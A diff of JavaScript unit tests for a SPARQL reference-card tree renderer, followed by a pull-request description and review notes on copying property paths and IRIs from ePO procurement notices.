+    '<http://data.europa.eu/m8g/x(y)>',
+  );
+});
+
+test('_shrinkOrBracket brackets a local part ending in a dot', () => {
+  // A trailing dot would run into the statement terminator.
+  const r = makeRenderer();
+  assert.equal(
+    r._shrinkOrBracket('http://schema.org/foo.'),
+    '<http://schema.org/foo.>',
+  );
+});
+
+test('_shrinkOrBracket allows dots and hyphens inside a local part', () => {
+  const r = makeRenderer();
+  assert.equal(r._shrinkOrBracket('http://schema.org/foo-bar.baz'), 'schema:foo-bar.baz');
+});
+
+test('_formatPropertyPath does not emit a slash that would be read as a sequence', () => {
+  // "epo:announcesRole / schema:foo/bar" is a three-hop path, not a two-hop
+  // one — the query parses and means something the user never asked for.
+  const r = makeRenderer();
+  assert.equal(
+    r._formatPropertyPath([EPO_ANNOUNCES_ROLE, SCHEMA_NESTED]),
+    `epo:announcesRole / <${SCHEMA_NESTED}>`,
+  );
+});
+
+test('_buildPathPattern brackets an unparseable type in the anchor', () => {
+  const r = makeRenderer();
+  navigatedTo(r, REVIEWER, [], null);
+  assert.equal(
+    r._buildPathPattern(REVIEWER, typedAs(SCHEMA_NESTED)),
+    `?bar a <${SCHEMA_NESTED}> .`,
+  );
+});
+
+test('_buildInfoRows offers a Name that can actually be pasted', () => {
+  // The card says "use the following in your SPARQL query", so the Name row
+  // is held to the same standard as the Path row.
+  const r = makeRenderer();
+  r.subjectIndex = r._buildIndex([quad(REVIEWER, RDF_TYPE, namedNode(SCHEMA_NESTED))]);
+  const html = r._buildInfoRows(REVIEWER, r.subjectIndex.get(REVIEWER));
+
+  assert.ok(!html.includes('schema:foo/bar'), 'never offers the malformed prefixed name');
+  assert.ok(html.includes('&lt;http://schema.org/foo/bar&gt;'), 'offers the full IRI instead');
+});
+
+test('_buildInfoRows offers a parseable Name for a vocabulary subject', () => {
+  // The card is also shown for ontology terms, which take a different branch
+  // built from resolvePrefix() — same blind namespace split, same hazard.
+  const r = makeRenderer();
+  const html = r._buildInfoRows(SCHEMA_NESTED, new Map());
+
+  assert.ok(!html.includes('schema:foo/bar'), 'never offers the malformed prefixed name');
+  assert.ok(html.includes('&lt;http://schema.org/foo/bar&gt;'), 'offers the full IRI instead');
+});
+
+test('_buildInfoRows still shortens a well-formed vocabulary subject', () => {
+  const r = makeRenderer();
+  const html = r._buildInfoRows(EPO_NOTICE_CLASS, new Map());
+
+  assert.ok(html.includes('epo:Notice'), 'prefixed name kept');
+  assert.ok(html.includes('PREFIX epo:'), 'and its declaration offered alongside');
+});
+
+test('_buildInfoRows omits the prefix declaration when the name is a bracketed IRI', () => {
+  // A PREFIX line is only useful if something below actually uses the prefix.
+  const r = makeRenderer();
+  assert.ok(!r._buildInfoRows(SCHEMA_NESTED, new Map()).includes('PREFIX schema:'));
+
+  const typed = r._buildIndex([quad(REVIEWER, RDF_TYPE, namedNode(SCHEMA_NESTED))]);
+  assert.ok(!r._buildInfoRows(REVIEWER, typed.get(REVIEWER)).includes('PREFIX schema:'));
+});
+
+// ── navigation context on every clickable term ──────────────────────
+//
+// The Path row is only correct if every link that navigates reports how it was
+// reached. A link that reports nothing makes navigationPath() abandon the
+// route, and the card silently drops back to a bare type binding — which looks
+// like a rendering quirk rather than the lost information it is.
+
+// The cycle marker is a guard inside _renderSubjectTree, entered when the
+// subject is already on the current branch. _partitionObjects filters those
+// out before recursing, so render() does not reach it today — the guard exists
+// for a caller that forgets to. It is driven here through _renderSubjectTree,
+// which is the entry point that would actually reach it.
+
+test('_renderCycleMarker reports the route that reached it', () => {
+  // The marker stands where a nested card would have been, so following it is
+  // the same navigation and has to carry the same context.
+  const r = makeRenderer();
+  const ctx = { root: NOTICE, anchor: '?notice a epo:Notice', chain: [EPO_ANNOUNCES_ROLE] };
+  const captured = [];
+  const original = r._navigationContext.bind(r);
+  r._navigationContext = (c) => { captured.push(c); return original(c); };
+
+  r._renderCycleMarker(NOTICE, ctx);
+
+  assert.deepEqual(captured, [ctx], 'the marker asks for the context it was given');
+});
+
+test('_renderSubjectTree hands the walked route to the cycle marker', () => {
+  // Entering the guard the way a caller that skipped _partitionObjects would.
+  const r = makeRenderer();
+  r.subjectIndex = new Map([[NOTICE, new Map([[RDF_TYPE, [namedNode(EPO_NOTICE_CLASS)]]])]]);
+
+  const seen = [];
+  const original = r._renderCycleMarker.bind(r);
+  r._renderCycleMarker = (subject, ctx) => { seen.push({ subject, ctx }); return original(subject, ctx); };
+
+  const ctx = {
+    root: NOTICE,
+    anchor: '?notice a epo:Notice',
+    chain: [EPO_ANNOUNCES_ROLE, EPO_PLAYED_BY],
+  };
+  r._renderSubjectTree(NOTICE, new Set([NOTICE]), EPO_PLAYED_BY, ctx);
+
+  assert.equal(seen.length, 1, 'the guard fired');
+  assert.deepEqual(seen[0].ctx.chain, [EPO_ANNOUNCES_ROLE, EPO_PLAYED_BY], 'full route preserved');
+  assert.equal(seen[0].ctx.root, NOTICE);
+  assert.equal(seen[0].ctx.anchor, '?notice a epo:Notice');
+});
+
+test('_partitionObjects is what keeps the cycle guard unreachable from render', () => {
+  // If this ever stops holding, the guard becomes live — and it now carries
+  // the route, so the card keeps working rather than silently resetting.
+  const r = makeRenderer();
+  r.subjectIndex = new Map([[NOTICE, new Map()]]);
+  const [nestable, nonNestable] = r._partitionObjects([namedNode(NOTICE)], new Set([NOTICE]));
+
+  assert.equal(nestable.length, 0, 'an ancestor is never recursed into');
+  assert.equal(nonNestable.length, 1, 'it renders as a leaf instead');
+});
+
+test('predicate links deliberately carry no route', () => {
+  // Clicking a predicate opens its definition in the ontology. That is not a
+  // step on the walked route, so claiming the chain there would assert a
+  // relationship the data does not contain. Locked down so the omission is
+  // not later "fixed" into a bug.
+  const r = makeRenderer();
+  const predicates = new Map([[EPO_ANNOUNCES_ROLE, [literal('x')]]]);
+  const ctx = { root: NOTICE, anchor: '?notice a epo:Notice', chain: [EPO_ANNOUNCES_ROLE] };
+
+  const header = r._buildCardHeader(NOTICE, predicates, EPO_ANNOUNCES_ROLE, ctx);
+  const predEl = header._children.find(c => c.classList?.contains('predicate'));
+  assert.ok(predEl, 'the predicate label is rendered');
+  assert.equal(predEl._listeners?.get('click')?.length ?? 0, 0, 'and navigates without a route');
+});
+
+// ── every navigating link in a rendered tree ────────────────────────
+//
+// The cycle marker lost its route because context is passed link by link, and
+// one call site was missed. Rather than testing that site, this walks a real
+// rendered tree and holds every navigating link to the rule — so the next call
+// site that forgets is caught by a test nobody had to remember to write.
+
+test('every link in a rendered tree either carries its route or is a predicate', () => {
+  const captured = [];
+  setController({ navigateTo: (facet) => captured.push(facet) });
+
+  const container = document.createElement('div');
+  const r = new TreeRenderer(container);
+  r.render([
+    quad(NOTICE, RDF_TYPE, namedNode(EPO_NOTICE_CLASS)),
+    quad(NOTICE, EPO_ANNOUNCES_ROLE, namedNode(REVIEWER)),
+    quad(REVIEWER, RDF_TYPE, namedNode(EPO_REVIEWER_CLASS)),
+    quad(REVIEWER, EPO_PLAYED_BY, namedNode(ORGANISATION)),
+    quad(ORGANISATION, RDF_TYPE, namedNode(EPO_ORGANISATION_CLASS)),
+  ], {});
+
+  // Force the lazy bodies so nested levels are included.
+  for (const toggle of container.querySelectorAll('.tree-toggle')) {
+    for (const handler of toggle._listeners.get('click') || []) {
+      handler({ target: toggle, stopPropagation() {}, preventDefault() {} });
+    }
+  }
+
+  // Click everything that navigates, remembering whether it was a predicate.
+  const clicked = [];
+  const walk = (el) => {
+    for (const child of el._children || []) {
+      if (child.nodeType !== 1) continue;
+      const handlers = child._listeners?.get('click') || [];
+      const navigates = handlers.length && !String(child.className).includes('tree-toggle');
+      if (navigates) {
+        const isPredicate = child.classList?.contains('predicate');
+        const before = captured.length;
+        handlers.forEach(h => h({ target: child, preventDefault() {}, stopPropagation() {} }));
+        if (captured.length > before) clicked.push({ isPredicate, facet: captured[captured.length - 1] });
+      }
+      walk(child);
+    }
+  };
+  walk(container);
+
+  assert.ok(clicked.length >= 3, `expected several navigating links, got ${clicked.length}`);
+
+  for (const { isPredicate, facet } of clicked) {
+    if (isPredicate) {
+      // Jumping to a predicate's definition is not a step along the route.
+      assert.deepEqual(facet.viaPath, [], 'a predicate link reports no route');
+      continue;
+    }
+    assert.ok(Array.isArray(facet.viaPath), 'a resource link reports a route array');
+    assert.ok(facet.viaRoot, 'and the subject that route starts from');
+    assert.ok(facet.viaRootPattern, 'and the pattern binding that subject');
+  }
 });


### PR DESCRIPTION
Re-implementation of #110 on a clean base, for issue #73.

`rework/2.4.0` is `develop` as it stood after #105, before the 2.4.0 work began. This branch contains @Anoop-Variyan's original #110 commit unchanged, with the review changes on top, so the two can be compared directly.

## What changed and why

The original added a clipboard icon, revealed on hover, to nested cards and leaf rows. The application already answers "tell me about this element" through the `<>` SPARQL reference card, so a second control for the same question introduced a competing convention. The path is now a row on that card.

That change had a consequence. The `<>` card appears on the top node of the displayed tree, and a top node has no predicate chain within its own graph — so the path could no longer be derived from the tree. It is now taken from the navigation history instead: each tree click records the predicates it traversed on the breadcrumb facet, and the card reconstructs the route from the first breadcrumb entry to the resource on screen.

The result is closer to what #73 asks for. The original showed a node's position inside the currently loaded graph, which resets on every navigation. This shows the route walked from the notice, which accumulates as you go deeper and shortens as you step back.

## The card

```
Prefix   PREFIX epo: <http://data.europa.eu/a4g/ontology#>
Name     epo:Reviewer
Path     ?notice a epo:Notice ; epo:announcesRole ?reviewer .
IRI      <http://data.europa.eu/a4g/resource/…>
```

Retained from the original: the predicate-chain threading through the render recursion, and the URI shortening in `_formatPropertyPath`.

## Notable decisions

- **All declared types are bound**, not one. A notice carries `epo:Notice` alongside `epo:CompetitionNotice` and a mapping-version class such as `epo:Notice16`, in no guaranteed order. Selecting one made the pattern depend on the order the endpoint returned the triples in; during testing this produced `?notice16 a epo:Notice16`.
- **Prefix declarations are derived from the finished rows**, so a path crossing several vocabularies declares all of them.
- **Untyped blank nodes get no Path and no IRI row.** A blank node's label belongs to a single parse and cannot be referenced in a query.
- **Route metadata is stripped at the URL and sessionStorage boundaries** (`validateFacet`). It describes a live exploration and is deliberately absent from shareable links, so anything arriving over one is forged. `viaRootPattern` is interpolated into the Path row, so an unvalidated one would let a crafted link place arbitrary SPARQL in front of a recipient.
- **Predicate links carry no route.** They lead to a term's definition in the ontology, which is not a step along the walked path.

## Tests

397 pass. `test/referenceCardSparql.test.js` parses everything the card offers with `sparqljs` across 22 resource shapes, rather than comparing against expected strings, and checks that the declared prefixes cover what the rows use. Verified separately against 2,000+ cards built from live notices.

## Known limitations

- A shared link does not reproduce the path; the card falls back to a type binding. Shared links already discard intermediate breadcrumb entries, so this is consistent with existing behaviour rather than new. Worth a separate issue covering both.
- `test/_helpers.js` grew to support these tests. See #117.


---

## Review round 1 — @Anoop-Variyan

> 1. Path is not available for the last nodes.
> 2. It is not user friendly to click through each entity to copy the path.

Both were consequences of the path living only on the card you had navigated to. A literal is never a card, so it had no path at all; and collecting several meant walking the tree once per value.

Every card header and every row now carries an actions menu:

```
⋮  Copy path
   Copy value
   ─────────────────────
   <> SPARQL reference card
```

- **Copy path** — the pattern reaching that value from the notice, as one property path however deep the row sits. First, because someone reading a notice this closely is usually learning SPARQL and ePO.
- **Copy value** — the literal's text, or the resource's IRI. On a card header, **Copy IRI**.
- **SPARQL reference card** — what the `<>` button opened before, now describing the statement the row makes: the property as Name, the route to its value as Path, and the value's IRI where it has one.

The card is anchored on what it describes — the property on a row, the badge on a header — not on the kebab at the right edge, which says nothing about which row was asked about.

An item with nothing to offer is absent rather than disabled: a blank node has no IRI to copy, an untyped one has no path, and an ontology term has no path either — it is not a place the data leads to, so its card offers **Usage** instead, the shape of the statement the property makes, read from its domain and range.

Popovers and menus are built when first opened. A notice puts hundreds of these on screen and almost none is opened.

### Also here

- `epo:hasPublicationDate` and the like now show a Usage row (`?document epo:hasPublicationDate ?date .`) where a Path would have been meaningless.
- A row pointing back at its own anchor binds a second variable. `?notice a epo:Notice ; epo:refersToPrevious ?notice .` matches only notices that refer to themselves.
- Terms are recognised by what they declare themselves to be, falling back to the namespace, so a vocabulary this application has never seen is still a vocabulary.
- Toasts are opaque; Bootstrap makes them 85% by default and they land over the tree.

445 tests pass, up from 397. Every behaviour above was mutation-checked — the change reverted, the test seen to fail, the change restored.
